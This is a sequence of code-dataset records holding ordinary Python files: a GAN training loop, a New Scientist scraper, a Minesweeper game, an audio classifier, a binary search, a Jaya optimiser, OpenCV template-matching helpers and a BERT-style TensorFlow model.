example_z=make_z(batch_size)\n inputs,targets=batch\n td_err+=train_d(inputs,example_z)\n td_batches+=1\n example_z=make_z(batch_size)\n test_accx,test_accg=val_d(X_train,example_z)\n if ((test_accx>pp1)and(test_accg>pp1)):\n break\n histd[epoch]=td_err/td_batches\n\n #update G\n tz_err=0\n tz_batches=0\n for j in range(p):\n example_z=make_z(batch_size)\n tz_err+=train_g(example_z)\n tz_batches+=1\n example_z=make_z(batch_size)\n dd=get_dg(example_z)\n if (pp2<np.sum(dd[:,1])/batch_size):\n break\n histg[epoch]=tz_err/tz_batches\n #Test\n example_z=make_z(batch_size)\n result=get_g(example_z)\n \n\n print(\"Epoch {} of {} took {:.3f}s\".format(epoch + 1, train_iters, time.time() - start_time))\n print(\" training loss:\\t\\t{:.6f}\".format(histd[epoch]))\n print(\" adjust G loss:\\t\\t{:.6f}\".format(histg[epoch]))\n \n if (epoch%10==0):\n plt.rcParams['figure.figsize'] = (15,15)\n for j in xrange(row*col):\n plt.subplot(row,col,j)\n plt.imshow(result[j].reshape(28,28))\n plt.axis('off')\n #plt.subplot(1,2,2)\n #plt.imshow(result.reshape(28,28))\n #plt.axis('off')\n plt.show()\n\n\n# In[ ]:\n\n\n\n","sub_path":"ref/GAN/GAN-MNIST-GAN.py","file_name":"GAN-MNIST-GAN.py","file_ext":"py","file_size_in_byte":7730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"57250714","text":"# coding : utf-8\n\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\n\nentetes = {\n\t\"User-Agent\":\"Alexis Gohier-Drolet, requête envoyée pour un cours de data\",\n\t\"From\":\"alexis_gohier@hotmail.com\"\n}\n\nfichier = \"newScientist.csv\"\n\nfor n in range(1,493):\n\turl = \"https://www.newscientist.com/section/news/page/{}/\".format(n)\n\tprint(url)\n\n\tcontenu = requests.get(url, headers=entetes)\n\tpage = BeautifulSoup(contenu.text, \"html.parser\")\n\t# print(page)\n\n\turlArticles = page.find_all(\"h2\", class_=\"entry-title\")\n\t# print(page.find(\"h2\",class_=\"entry-title\"))\n\t# print(urlArticles)\n\n\tfor urlArticle in urlArticles:\n\t\tscientist = []\n\t\ttry:\n\t\t\turl2 = urlArticle.a[\"href\"]\n\t\t\t#print(url2)\n\t\t\turl2 = \"https://www.newscientist.com\" + url2\n\t\t\tprint(url2)\n\t\t\tscientist.append(url2)\n\n\t\t\tcontenu2 = requests.get(url2)\n\t\t\tpage2 = BeautifulSoup(contenu2.text, \"html.parser\")\n\n\t\t\ttitre = page2.title\n\t\t\t#print(titre)\n\t\t\tscientist.append(titre)\n\t\t\t# print(scientist)\n\n\t\t\t#bob = open(fichier, \"a\")\n\t\t\t#eponge = csv.writer(bob)\n\t\t\t#eponge.writerow(scientist)\n\n\t\texcept:\n\t\t\tprint(\"Rien\")\n\n\n\n","sub_path":"moisson-1.py","file_name":"moisson-1.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"187855828","text":"\"\"\"\nMineSweeper Game API.\nYou can play the game in terminal.\ne.g. type 3, 0 to uncover the tile in Row_3, Col_0.\n\"\"\"\nimport random\nimport numpy as np\nDIM_1 = 9\nDIM_2 = 9\nNMINES = 8\nPICK_TIME = 1\nCOVERED = -1\n\n\n# the \"game board\", with state\nclass MineSweeper:\n def __init__(self, dim_1=DIM_1, dim_2=DIM_2, nMines=NMINES):\n # params\n self.dim1 = dim_1\n self.dim2 = dim_2\n self.totalCells = self.dim1 * self.dim2\n self.nMines = nMines\n self.mines = np.zeros([self.dim1, self.dim2])\n self.neighbors = np.zeros([self.dim1, self.dim2])\n self.state = np.zeros([self.dim1, self.dim2])\n self.state.fill(np.nan)\n self.initialized = False\n self.gameOver = False\n self.victory = False\n self.flag = np.zeros([self.dim1, self.dim2])\n\n def initialize(self, coordinates): # not run until after first selection!\n # set up mines\n # randomly place mines anywhere *except* first selected location AND surrounding cells\n # so that first selection is always a 0\n # weird, yes, but that's how the original minesweeper worked\n availableCells = range(self.totalCells)\n selected = coordinates[0] * self.dim2 + coordinates[1]\n offLimits = np.array(\n [selected - self.dim2 - 1, selected - self.dim2, selected - self.dim2 + 1, selected - 1, selected,\n selected + 1, selected + self.dim2 - 1, selected + self.dim2,\n selected + self.dim2 + 1]) # out of bounds is ok\n availableCells = np.setdiff1d(availableCells, offLimits)\n self.nMines = np.minimum(self.nMines,\n len(availableCells)) # in case there are fewer remaining cells than mines to place\n minesFlattened = np.zeros([self.totalCells])\n minesFlattened[np.random.choice(\n availableCells, self.nMines, replace=False)] = 1\n self.mines = minesFlattened.reshape([self.dim1, self.dim2])\n # set up neighbors\n for i in range(self.dim1):\n for j in range(self.dim2):\n nNeighbors = 0\n for k in range(-1, 2):\n if 0 <= i + k < self.dim1:\n for l in range(-1, 2):\n if 0 <= j + l < self.dim2 and (k != 0 or l != 0):\n nNeighbors += self.mines[i + k, j + l]\n self.neighbors[i, j] = nNeighbors\n # done\n self.initialized = True\n\n def clearEmptyCell(self, coordinates):\n x = coordinates[0]\n y = coordinates[1]\n self.state[x, y] = self.neighbors[x, y]\n if self.state[x, y] == 0:\n for i in range(-1, 2):\n if 0 <= x + i < self.dim1:\n for j in range(-1, 2):\n if 0 <= y + j < self.dim2:\n if np.isnan(self.state[x + i, y + j]):\n self.clearEmptyCell((x + i, y + j))\n\n def selectCell(self, coordinates):\n # condition always fails on first selection\n if self.mines[coordinates[0], coordinates[1]] > 0:\n self.gameOver = True\n self.victory = False\n else:\n if not self.initialized: # runs after first selection\n self.initialize(coordinates)\n self.clearEmptyCell(coordinates)\n if np.sum(np.isnan(self.state)) == self.nMines:\n self.gameOver = True\n self.victory = True\n\n def get_surrounding(self, row, col):\n SURROUNDING = ((-1, -1), (-1, 0), (-1, 1), (0, -1),\n (0, 1), (1, -1), (1, 0), (1, 1))\n\n neighbours = []\n for pos in SURROUNDING:\n temp_row = row + pos[0]\n temp_col = col + pos[1]\n if 0 <= temp_row < self.dim1 and 0 <= temp_col < self.dim2:\n neighbours.append((temp_row, temp_col))\n\n return neighbours\n\n\ndef getMState(map, dim_1=DIM_1, dim_2=DIM_2):\n mState = np.zeros((dim_1, dim_2))\n for row in range(dim_1):\n for col in range(dim_2):\n if np.isnan(map[row, col]):\n mState[row, col] = COVERED\n else:\n mState[row, col] = map[row, col]\n return mState\n\n\ndef dataGenerator(dataSize, pickTime, dim_1=DIM_1, dim_2=DIM_2, nMine=NMINES):\n gameState = []\n mineMap = []\n for _ in range(dataSize):\n game = MineSweeper(dim_1, dim_2, nMine)\n # Pick PICK_TIME times\n for i in range(pickTime):\n x = random.randint(0, dim_1 - 1)\n y = random.randint(0, dim_2 - 1)\n # if picks a mine or number, pick another\n if game.mines[x, y] == 1 or not np.isnan(game.state[x, y]):\n i = i - 1\n continue\n game.selectCell((x, y))\n # print(game.state)\n # exit()\n gameState.append(getMState(game.state, dim_1, dim_2))\n mineMap.append(game.mines)\n return gameState, mineMap\n\n\nif __name__ == \"__main__\":\n # Init the game\n game = MineSweeper()\n print(\"%dx%d Grid with %d Mines\" % (game.dim1, game.dim2, game.nMines))\n # Play\n while True:\n print(game.state)\n if game.victory:\n print(\"You WIN!!!\")\n break\n y, x = map(lambda var: int(var), input(\n \"(y, x) coordinate: \").split(\",\"))\n game.selectCell((y, x))\n if game.gameOver:\n print(\"BOOM!!!\")\n break\n","sub_path":"code/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"575304426","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 18 11:21:50 2018\n\n@author: jin\n\"\"\"\n\nimport os\nimport os.path\nimport numpy as np\nimport pandas as pd\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\nimport librosa\n\nDATA_PATH = '/Users/jin/Downloads/Data/'\n\ndef conv_wav_to_mfcc(path, file_full_names, max_length=15):\n wave, sr = librosa.load(path + file_full_names, mono=True, sr=None)\n wave = wave[::3]\n mfcc = librosa.feature.mfcc(wave, sr=16000)\n\n if (max_length > mfcc.shape[1]):\n pad_width = max_length - mfcc.shape[1]\n mfcc = np.pad(mfcc, pad_width=((0, 0), (0, pad_width)), mode='constant')\n\n else:\n mfcc = mfcc[:, :max_length]\n \n return mfcc\n\ndef make_npy_file(full_file_names):\n mfcc_vectors = []\n for i in range(len(full_file_names)):\n print(i)\n mfcc = conv_wav_to_mfcc(DATA_PATH, full_file_names[i])\n mfcc_vectors.append(mfcc) \n np.save('mfcc_version.npy', mfcc_vectors)\n \n\ndef main():\n \n file_names = []\n full_file_names = []\n for filename in os.listdir(DATA_PATH):\n full_file_names.append(filename)\n name = os.path.splitext(filename)[0]\n file_names.append(name)\n full_file_names.pop(1284)\n \n df = pd.Series(file_names)\n df = pd.DataFrame(df.str.split('-',1).tolist(), columns = ['Subclass', 'Target'])\n df = df.dropna(axis = 0)\n \n \n if os.path.isfile('mfcc_version.npy')!=1:\n make_npy_file(full_file_names)\n\n X = np.load('mfcc_version.npy')\n y = df.iloc[:,1:2].values\n y = y.astype(int)\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size= 0.25, random_state=0, shuffle=True)\n \n X_train = X_train.reshape(X_train.shape[0], 20, 15, 1)\n X_test = X_test.reshape(X_test.shape[0], 20, 15, 1)\n \n y_train_category = to_categorical(y_train)\n y_test_category = to_categorical(y_test)\n \n model = Sequential()\n \n model.add(Conv2D(36, kernel_size=(2, 2), activation='relu', input_shape=(20, 15, 1)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(132, activation='relu'))\n model.add(Dropout(0.25))\n model.add(Dense(10, activation='softmax'))\n model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy'])\n \n model.fit(X_train, y_train_category, batch_size=150, epochs=200, verbose=1, validation_data=(X_test, y_test_category))\n \nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"AudioClassML.py","file_name":"AudioClassML.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"313945445","text":"import timeit\nimport time\nimport datetime\n\n\n#\n# def Binarysearch(arr, size, value):\n# low = 0\n# high = size - 1\n# while low <= high:\n# mid = int(low + (high - low) / 2) # To avoid overflow\n# if arr[mid] == value:\n# return True\n# elif arr[mid] < value:\n# low = mid + 1\n# else:\n# high = mid - 1\n# return False\n#\n# def binary_search(a_list, item):\n# first = 0\n# last = len(a_list) - 1\n# found = False\n# while first <= last and not found:\n# midpoint = (first + last) // 2\n# if a_list[midpoint] == item:\n# found = True\n# else:\n# if item < a_list[midpoint]:\n# last = midpoint - 1\n# else:\n# first = midpoint + 1\n# return found\n#\n\ndef binary_search(arr, value):\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = low + (high - low)// 2 #此处必须用//才能得到int\n if arr[mid] == value:\n return True\n else:\n if value < arr[mid]:\n high = mid - 1\n else:\n low = mid + 1\n return False\n\n\nif __name__ == '__main__':\n test_list = [0, 1, 2, 8, 13, 17, 19, 32, 42]\n # t1 = timeit.timeit(stmt=Binarysearch(test_list,len(test_list),2), number=2)\n # print(t1)\n print(binary_search(test_list, 17))\n","sub_path":"algorithm/search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"198281002","text":"import tensorflow as tf\nimport numpy as np\nimport math\nimport random\n\nfrom ENCODER import ENCODER_pre_post_fdfd# import encoder\nfrom ENCODER import ENCODER# import encoder\n\nfrom EMBEDDING.EMBEDDING import embedding\nfrom ADD_NORM.ADD_NORM import add,layer_norm\nclass bert:\n def __init__(self,lr,input_nums,hidden_nums,output_nums,max_position_dim=512,layers_encoder=12,labels_num=2,multi_head=12):#input_num=768 \n\n self.input_nums=input_nums\n self.max_position_dim=max_position_dim#512\n\n self.encoders=[ENCODER_pre_post_fdfd.encoder(input_nums=input_nums,hidden_nums=hidden_nums,output_nums=output_nums,multi_head=multi_head)]+[ENCODER.encoder(input_nums=input_nums,hidden_nums=hidden_nums,output_nums=output_nums,multi_head=multi_head) for _ in range(layers_encoder-1)]\n \n self.embed_position=embedding(max_position_dim,input_nums)\n\n self.w_vc=tf.Variable(tf.random.truncated_normal([output_nums,labels_num],stddev=tf.math.sqrt(2.0/(output_nums+labels_num))))\n self.b_vc=tf.Variable(tf.zeros(labels_num))\n \n self.opt=tf.keras.optimizers.Adam(learning_rate=lr, beta_1=0.9, beta_2=0.98, epsilon=1e-09)\n \n def __call__(self,x,dropout_rate=0.1):\n '''\n function:bert的主体操作\n parameter:\n '''\n embedd_x=x\n \n \n pos=range(x.shape[1])\n\n pos_one_hot=tf.one_hot(pos,self.max_position_dim)\n pos_one_hot=tf.reshape(pos_one_hot,[1,pos_one_hot.shape[0],pos_one_hot.shape[-1]])\n embedd_pos=self.embed_position.embedding_lookup(pos_one_hot)\n\n \n embedd_x=embedd_x+embedd_pos\n \n \n output_x=embedd_x\n \n \n temp=[]\n final_output=output_x\n for i in range(len(self.encoders)):\n \n output_x_2,_,_=self.encoders[i](output_x,dropout_rate)\n output_x=output_x_2+output_x\n output_x=layer_norm(output_x)#这里有ln代表,到最后所有的输出相��之前就已经经历了无数个ln,有嵌套的ln\n\n \n \n logits=tf.matmul(output_x,self.w_vc)+self.b_vc\n\n ppgs=tf.nn.softmax(logits)\n #print(ppgs)\n #print(tf.math.reduce_sum(ppgs[:,0,:]))\n preds = tf.cast(tf.argmax(logits, axis=-1),dtype=tf.int32)\n \n return logits,ppgs,preds#tf.concat([mid_result,output_x],-1)#把最后结果和中间结果拼接\n \n \n \n \n def loss_sigmoid(self,output,y):#gamma=5\n \n return -1.*tf.reduce_mean(tf.multiply(tf.math.log(tf.math.sigmoid(output+ 1e-10)),y)+tf.reduce_mean(tf.multiply(tf.math.log((1-tf.math.sigmoid(output+ 1e-10))),(1-y))))\n\n def loss(self,output,y,gamma=3):#gamma=5\n \n return -1*tf.reduce_mean(tf.multiply(tf.multiply(tf.math.log(output+ 1e-10),y),tf.math.pow((1-output),gamma)))#Focal loss\n def loss_ce(self,output,y):\n return -1*tf.reduce_mean(tf.multiply(tf.math.log(output+ 1e-10),y))\n def am_softmax_loss(self,output,y,margin=0.35,scale=30):\n \n y_pred = (y * (output - margin) + (1 - y) * output) * scale\n y_pred=tf.nn.softmax(y_pred,axis=-1)\n #print(tf.reduce_sum(tf.nn.softmax(y_pred,axis=-1)[0,0,:]))\n \n return self.loss_cr(y_pred,y)\n\n def get_params_vc(self):\n params=[]\n\n params.append(self.w_vc)\n\n params.append(self.b_vc)\n\n\n return params\n\n \n def get_params_bert_layer(self):\n params=[]\n\n #params.extend(self.embed_token.get_params())\n\n #params.extend(self.embed_position.get_params())\n \n params.extend([inner_cell for cell in self.encoders for inner_cell in cell.get_params()])\n\n return params\n \n def get_params_bert_position(self):\n params=[]\n\n params.extend(self.embed_position.get_params())\n \n return params\n \n def get_params(self):\n params=[]\n\n #params.extend(self.embed_token.get_params())\n\n params.extend(self.embed_position.get_params())\n \n params.extend([inner_cell for cell in self.encoders for inner_cell in cell.get_params()])\n\n return params\n \n def update_params(self,grads,params):\n self.opt.apply_gradients(grads_and_vars=zip(grads,params))\n \n def gelu(self,input_tensor):\n #cdf = 0.5 * (1.0 + tf.math.erf(input_tensor / tf.math.sqrt(2.0)))\n\n cdf2 = 0.5 * (1.0 + tf.nn.tanh((input_tensor+0.044715*tf.math.pow(input_tensor,3))*tf.math.sqrt(2.0/math.pi)))\n \n return input_tensor*cdf2\n\n \n\n\n","sub_path":"BERT_pre_post_fdfd.py","file_name":"BERT_pre_post_fdfd.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"108468411","text":"# -*- coding: utf-8 -*-\nfrom .base import JayaBase\nfrom pyjaya.clasic import JayaClasic\nfrom .population import Population\nfrom .solution import Solution\nfrom multiprocessing import Process, Queue, current_process, freeze_support\nfrom multiprocessing import Pool\nimport numpy as np\n\n\nclass JayaSAMPE(JayaBase):\n\n def sprint(self, population):\n # result = population.getBestAndWorst()\n # solutions = list()\n\n numSolutions = len(population.solutions)\n jaya_clasic = JayaClasic(\n numSolutions, self.listVars, self.functionToEvaluate,\n population=population)\n if self.minimax:\n jaya_clasic.toMaximize()\n\n population = jaya_clasic.run(1)\n return population\n\n @staticmethod\n def worker(sampe, population):\n return sampe.sprint(population)\n\n def generate(self, m):\n entrada = self.population.divideInToWithElitist(m)\n # print(\" ### entradas (luego de la division con elitismo)\")\n # [print(e.solutions) for e in entrada]\n # print(\" ###\")\n pool = Pool(processes=3)\n results = [\n pool.apply_async(\n JayaSAMPE.worker, args=(self, x)) for x in entrada]\n subPopulations = [p.get() for p in results]\n\n newPopulation = Population(self.minimax)\n newPopulation.merge(subPopulations)\n # new_best_value = newPopulation.getBestAndWorst()['best_value']\n # old_best_value = self.population.getBestAndWorst()['best_value']\n #\n # if self.minimax:\n # if new_best_value > old_best_value:\n # self.population = newPopulation\n # else:\n # if new_best_value < old_best_value:\n # self.population = newPopulation\n # self.population = newPopulation\n # newPopulation.getBestAndWorst()\n self.population = newPopulation\n\n def run(self, number_iterations):\n result = self.population.getBestAndWorst()\n bestValue = result['best_value']\n m = 2\n for i in range(number_iterations):\n # print(i, self.population.solutions)\n if i == 0:\n # print(\"Generaring\", m)\n self.generate(2)\n else:\n if self.minimax:\n bV = self.population.getBestAndWorst()['best_value']\n if bV > bestValue:\n if m < self.numSolutions:\n m += 1\n bestValue = bV\n elif m > 2:\n m -= 1\n else:\n bV = self.population.getBestAndWorst()['best_value']\n if bV < bestValue:\n if m <= self.numSolutions:\n m += 1\n bestValue = bV\n elif m > 2:\n m -= 1\n # print(\"Generaring\", m)\n self.generate(m)\n # print(\"done\", m)\n return self.population.getBestAndWorst()\n","sub_path":"pyjaya/sampemultiprocess.py","file_name":"sampemultiprocess.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"379373952","text":"def fib(n):\n if n <= 2:\n return n\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef input_validation():\n while True:\n n = int(input(\"Input a int number: \"))\n if n < 0:\n print(\"The number must be non-negative\")\n continue\n print(\"The result is:\", fib(n))\n break\n\n\nwhile True:\n try:\n input_validation()\n break\n except ValueError:\n print(\"The number must be an integer\")\n","sub_path":"students/ryba_paula/lesson_03_functions/fibonacci_numbers.py","file_name":"fibonacci_numbers.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"527936838","text":"import os\nimport numpy as np\nimport imutils\nimport glob\nimport cv2\nimport cv2 as cv\nfrom enum import Enum\nfrom plot_helper import plot_helper as plt\nimport matplotlib.pyplot as plt2\n\n\nclass img_helper:\n\n\t@staticmethod \n\tdef find_scaled_path(template_path, img_path, match_bounds = [[0,0],[0,0]], min_scale = 0.1, max_scale = 2.0, steps = 40, show_progress = False):\n\t\tcv_template = cv.imread(template_path)\n\t\tcv_image = cv.imread(img_path)\n\t\treturn img_helper.find_scaled(cv_template, cv_image, match_bounds, min_scale, max_scale, steps, show_progress)\n\t\n\t@staticmethod\t\n\tdef find_scaled(cv_template, cv_image, match_bounds, min_scale = 0.1, max_scale = 2.0, steps = 40, show_progress = False):\n\t\ttemplate = cv_template\n\t\ttemplate = cv.cvtColor(template, cv.COLOR_BGR2GRAY)\n\t\ttemplate = cv.Canny(template, 50, 200)\n\t\tplt.show_bgr(template)\n\t\t(tH, tW) = template.shape[:2]\t\t\n\t\timage = cv_image\t\t\n\t\tgray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\t\tfound = None\n\t\t# loop over the scales of the image\n\t\tfor scale in np.linspace(min_scale, max_scale, steps)[::-1]:\n\t\t\t# resize the image according to the scale, and keep track\n\t\t\t# of the ratio of the resizing\n\t\t\tresized = imutils.resize(gray, width = int(gray.shape[1] * scale))\n\t\t\tr = gray.shape[1] / float(resized.shape[1])\n\t\t\t# if the resized image is smaller than the template, then break\n\t\t\t# from the loop\n\t\t\tif resized.shape[0] < tH or resized.shape[1] < tW:\n\t\t\t\tbreak\n\t\t\tedged = cv.Canny(resized, 50, 200)\t\t\t\n\t\t\tresult = cv.matchTemplate(edged, template, cv.TM_CCOEFF)\n\t\t\t(_, maxVal, _, maxLoc) = cv.minMaxLoc(result)\n\t\t\t# check to see if the iteration should be visualized\n\t\t\tif show_progress:\n\t\t\t\t# draw a bounding box around the detected region\n\t\t\t\tclone = np.dstack([edged, edged, edged])\n\t\t\t\tcv.rectangle(clone, (maxLoc[0], maxLoc[1]),\n\t\t\t\t\t(maxLoc[0] + tW, maxLoc[1] + tH), (0, 0, 255), 2)\n\t\t\t\tcv.imshow(\"Visualize\", clone)\n\t\t\t\tcv.waitKey(0)\n\t\t\t# if we have found a new maximum correlation value, then update\n\t\t\t# the bookkeeping variable\t\t\t\n\t\t\tif found is None or maxVal > found[0]:\n\t\t\t\tprint(maxLoc)\n\t\t\t\tprint(r)\n\t\t\t\tmaxMatch = imutils.resize(image, width = int(image.shape[1] * scale))[maxLoc[1]+match_bounds[0][1]:maxLoc[1]+tH+match_bounds[1][1],maxLoc[0]+match_bounds[0][0]:maxLoc[0]+tW+match_bounds[1][0]]\t\t\t\t\n\t\t\t\tfound = (maxVal, maxLoc, r, maxMatch)\n\t\t# unpack the bookkeeping variable and compute the (x, y) coordinates\n\t\t# of the bounding box based on the resized ratio\n\t\t(_, maxLoc, r, match) = found\n\t\t(startX, startY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))\n\t\t(endX, endY) = (int((maxLoc[0] + tW) * r), int((maxLoc[1] + tH) * r))\n\t\tprint(found)\n\t\t# draw a bounding box around the detected result and display the image\n\t\tcv.rectangle(image, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\tplt.show_bgr(image)\n\t\treturn startX, startY, endX, endY, r, match\n\t\n\n\t@staticmethod\n\tdef find(cv_template, cv_image):\n\t\ttemplate = cv.cvtColor(cv_template, cv.COLOR_BGR2GRAY) \n\t\ttemplate = cv.Canny(cv_template, 50, 200) \t\t\n\t\tedged = cv.cvtColor(cv_image, cv.COLOR_BGR2GRAY)\n\t\tedged = cv.Canny(cv_image, 50, 200)\t\t\n\t\tresult = cv.matchTemplate(edged, template, cv.TM_CCOEFF)\n\t\t(_, maxVal, _, maxLoc)= cv.minMaxLoc(result)\n\t\treturn maxVal, maxLoc\n\n\t@staticmethod\n\tdef find_best_match(dir, cv_image):\t\t\n\t\tfound = None\n\t\tfor filename in os.listdir(dir):\t\t\t\t\t\t \n\t\t\ttemplate_path = os.path.join(dir, filename)\n\t\t\ttemplate = cv.imread(template_path)\t\t\t\n\t\t\t(maxVal, maxLoc) = img_helper.find(template, cv_image)\n\t\t\tprint(f'{filename} : {maxVal}')\n\t\t\tif found == None or maxVal>found[0]:\n\t\t\t\tfound = (maxVal, maxLoc, filename)\n\t\treturn filename, maxVal\n\n\tdef find_first_match(dir, cv_image, threshold):\n\t\tfor filename in os.listdir(dir):\t\t\t\t\t\t \n\t\t\ttemplate_path = os.path.join(dir, filename)\n\t\t\ttemplate = cv.imread(template_path)\n\t\t\t(maxVal, maxLoc) = img_helper.find(template, cv_image)\n\t\t\tif (maxVal > threshold):\n\t\t\t\treturn filename\n\t\treturn None\n\n\tdef find_bf(cv_template, cv_image):\n # Initiate SIFT detector\n\t\tsift = cv.SIFT_create()\n\t\t# find the keypoints and descriptors with SIFT\n\t\tkp1, des1 = sift.detectAndCompute(cv_template, None)\n\t\tkp2, des2 = sift.detectAndCompute(cv_image, None)\n\t\t# BFMatcher with default params\n\t\tbf = cv.BFMatcher()\n\t\tbf = cv.BFMatcher()\n\t\tmatches = bf.knnMatch(des1,des2,k=2)\n\t\t# Apply ratio test\n\t\tgood = []\n\t\tfor m,n in matches:\n\t\t\tif m.distance < 0.95*n.distance:\n\t\t\t\tgood.append([m])\n\t\t# cv.drawMatchesKnn expects list of lists as matches.\n\t\timg3 = cv.drawMatchesKnn(cv_template,kp1,cv_image,kp2,good,None,flags=cv.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n\t\tplt2.imshow(img3),plt2.show()\n\t\treturn len(good)\n\n\n\t\t#matches = bf.knnMatch(des1, des2, k=2)\n\t\t## Apply ratio test\n\t\t#good = []\n\t\t#for m,n in matches:\n\t\t#\tif m.distance < 0.75*n.distance:\n\t\t#\t\tgood.append([m])\n\t\t## cv.drawMatchesKnn expects list of lists as matches.\n\t\t#img3 = cv.drawMatchesKnn(cv_template,kp1,cv_image,kp2,good,None,flags=cv.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n\t\t#plt2.imshow(img3),plt2.show()\n\t\treturn None\n\n\tdef find_best_match_bf(dir, cv_image):\t\t\n\t\tfound = None\n\t\tfor filename in os.listdir(dir):\t\t\t\t\t\t \n\t\t\ttemplate_path = os.path.join(dir, filename)\n\t\t\ttemplate = cv.imread(template_path)\t\t\t\n\t\t\tmaxVal = 1\n\t\t\tmatches = img_helper.find_bf(template, cv_image)\n\t\t\tif found == None or matches > found[0]:\n\t\t\t\tfound = (matches, filename)\n\t\t\t\n\t\treturn found\n\n\t@staticmethod\n\tdef match_with_alpha(cv_template, cv_image, cv_template_alpha):\n\t\timg = cv_image\t\t\n\t\ttempl = cv_template\n\t\t(tH, tW) = templ.shape[:2]\n\t\tchannels = cv.split(cv_template_alpha)\n\t\t#extract \"transparency\" channel from image\n\t\talpha_channel = np.array(channels[3]) \n\t\t#generate mask image, all black dots will be ignored during matching\n\t\tmask = cv.merge([alpha_channel,alpha_channel,alpha_channel])\n\t\tcv.imshow(\"Mask\", mask)\n\n\t\tresult = cv.matchTemplate(img, templ, cv.TM_CCORR_NORMED, None, mask)\n\t\t#cv.imshow(\"Matching with mask\", result)\n\t\tmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\n\t\tprint('Highest correlation WITH mask', max_val)\n\t\t(startX, startY) = (int(max_loc[0]), int(max_loc[1]))\n\t\t(endX, endY) = (int((max_loc[0] + tW)), int((max_loc[1] + tH)))\n\t\tcv.rectangle(img, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\tplt.show_bgr(img)\n\t\tresult = cv.matchTemplate(img, templ, cv.TM_CCORR_NORMED)\n\t\t#cv.imshow(\"Matching without mask\", result)\n\t\tmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\n\t\tprint('Highest correlation without mask', max_val)\n\t\t(startX, startY) = (int(max_loc[0]), int(max_loc[1]))\n\t\t(endX, endY) = (int((max_loc[0] + tW)), int((max_loc[1] + tH)))\n\t\tcv.rectangle(img, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\tplt.show_bgr(img)\n\n\t@staticmethod\n\tdef match_with_mask(cv_template, cv_image):\n\t\timg = cv_image\t\t\n\t\ttempl = cv_template\t\n\n\t\t(tH, tW) = templ.shape[:2]\n\t\tresult = cv.matchTemplate(img, templ, cv.TM_CCORR_NORMED, None, templ)\t\t\n\t\tmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\n\t\tprint('Highest correlation WITH mask', max_val)\n\t\t(startX, startY) = (int(max_loc[0] ), int(max_loc[1] ))\n\t\t(endX, endY) = (int((max_loc[0] + tW) ), int((max_loc[1] + tH) ))\n\t\t#cv.rectangle(img, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\t#plt.show_bgr(img)\n\n\t\t#result = cv.matchTemplate(img, templ, cv.TM_CCORR_NORMED)\t\t\n\t\t#min_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\n\t\t#(startX, startY) = (int(max_loc[0] ), int(max_loc[1] ))\n\t\t#(endX, endY) = (int((max_loc[0] + tW) ), int((max_loc[1] + tH) ))\n\t\t#print('Highest correlation without mask', max_val)\n\t\t#cv.rectangle(img, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\t#plt.show_bgr(img)\n","sub_path":"img_helper.py","file_name":"img_helper.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"158004325","text":"import re\nfrom scripts.handle_mysql import HandleMysql\nfrom scripts.handle_yaml import HandleYaml\nfrom scripts.handle_path import USER_ACCOUNT_FILE_PATH\n\n\nclass Parameterize:\n '''\n 参数化\n '''\n not_existed_tel_pattern = r'{not_existed_tel}' # 未注册的手机号\n not_existed_id_pattern = r'{not_existed_id}' # 不存在的id\n\n invest_user_tel_pattern = r'{invest_user_tel}' # 投资人的手机号\n invest_user_pwd_pattern = r'{invest_user_pwd}' # 投资人的密码\n invest_user_id_pattern = r'invest_user_id' # 投资人的id\n\n # 借款人的相关正则表达式\n borrow_user_id_pattern = r'{borrow_user_id}' # 借款用户id\n borrow_user_tel_pattern = r'{borrow_user_tel}' # 借款用户手机号\n borrow_user_pwd_pattern = r'{borrow_user_pwd}' # 借款人密码\n\n loan_id_pattern = r'{loan_id}'\n 